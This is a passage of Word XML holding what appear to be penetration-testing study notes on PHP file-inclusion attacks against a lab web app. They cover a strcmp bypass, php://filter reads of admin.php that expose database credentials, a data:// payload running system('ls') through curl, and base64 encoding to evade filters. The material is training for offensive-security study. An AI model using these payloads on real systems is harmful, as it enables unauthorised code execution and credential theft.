      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then this turns "password" into an array, and this makes strcmp return NULL, which results in the code looking like NULL = 0, which is true, so then we successfully did strcmp bypass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e4melwu1cnq2" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Wrappers (from XXXXXXXXX 9.2.2. PHP Wrappers)</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Base64 wrapper was used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId49">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zipper</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03F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Wrappers (specifically</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) can get you code execution for PHP sites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1487"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What's the catch? It's not allowed by default. You need </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be enabled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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And the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> php://filter/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can do stuff like base64 encoding which ends up showing us more information than normal. It shows php pages but with more info than normal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP offers a variety of protocol wrappers to enhance the language's capabilities. For example, PHP wrappers can be used to represent and access local or remote filesystems. We can use these wrappers to bypass filters or obtain code execution via File Inclusion vulnerabilities in PHP web applications. While we'll only examine the php://filter and data:// wrappers, many are available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the php://filter wrapper to display the contents of files either with or without encodings like ROT13 or Base64. In the previous section, we covered using LFI to include the contents of files. Using php://filter, we can also display the contents of executable files such as .php, rather than executing them. This allows us to review PHP files for sensitive information and analyze the web application's logic.</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Let's demonstrate this by revisiting the "Mountain Desserts" web application. First, we'll provide the admin.php file as a value for the "page" parameter, as in the last Learning Unit.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="445" name="image428.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image428.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>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t xml:space="preserve">Listing 21 shows the title and maintenance text we already encountered while reviewing the web application earlier. We also notice that the &lt;body&gt; tag is not closed at the end of the HTML code. We can assume that something is missing. PHP code will be executed server side and, as such, is not shown. When we compare this output with previous inclusions or review the source code in the browser, we can conclude that the rest of the index.php page's content is missing.</w:t>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t xml:space="preserve">Next, let's include the file, using php://filter to better understand this situation. We will not use any encoding on our first attempt. The PHP wrapper uses resource as the required parameter to specify the file stream for filtering, which is the filename in our case. We can also specify absolute or relative paths in this parameter.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2705100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="161" name="image155.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image155.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page=php://filter/resource=admin.php</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output of Listing 22 shows the same result as Listing 21. This makes sense since the PHP code is included and executed via the LFI vulnerability. Let's now encode the output with base64 by adding convert.base64-encode. This converts the specified resource to a base64 string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000406">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="465" name="image450.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image450.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">page=php://filter/convert.base64-encode/resource=admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000408">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000409">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 23 shows that we included base64 encoded data, while the rest of the page loaded correctly. We can now use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">base64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> program with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to decode the encoded data in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000040B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5410200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76" name="image79.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image79.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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t xml:space="preserve">The decoded data contains MySQL connection information, including a username and password. We can use these credentials to connect to the database or try the password for user accounts via SSH.</w:t>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t xml:space="preserve">While the php://filter wrapper can be used to include the contents of a file, we can use the data:// wrapper to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data in the running web application's code. This offers an alternative method when we cannot poison a local file with PHP code.</w:t>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t xml:space="preserve">Let's demonstrate how to use the data:// wrapper with the "Mountain Desserts" web application. To use the wrapper, we'll add data:// followed by the data type and content. In our first example, we will try to embed a small URL-encoded PHP snippet into the web application's code. We can use the same PHP snippet as previously with ls the command.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="451" name="image435.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image435.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl "http://mountaindesserts.com/meteor/index.php?page=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://text/plain,&lt;?php%20echo%20system('ls');?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 25 shows that our embedded data was successfully executed via the File Inclusion vulnerability and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000417">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When web application firewalls or other security mechanisms are in place, they may filter strings like "system" or other PHP code elements. In such a scenario, we can try to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper with base64-encoded data. We'll first encode the PHP snippet into base64, then use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to embed and execute it via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000418">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="256" name="image243.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image243.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 26 shows that we successfully achieved code execution with the base64-encoded PHP snippet. This is a handy technique that may help us bypass basic filters. However, we need to be aware that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper will not work in a default PHP installation. To exploit it, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId56">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId57">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">allow_url_include</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting needs to be enabled.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_23ii481iiixl" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find root directory in PHP</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="292" name="image295.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image295.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2336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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at phpinfo.php</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hactotiz4tqo" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php</w:t>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t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file (sometimes found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/phpinfo.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) can be helpful. For example, it sometimes give us the Kernel Version of the target machine, which can be used to exploit if the version is vulnerable. </w:t>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hyperlink r:id="rId59">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PG practice writeup also examines it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000426">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3822700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="139" name="image150.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image150.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3822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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see that we have linux kernel : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.19.0–8-amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000428">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">amd64 just means 64-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000429">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of the below is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">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42B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000042F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1930400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
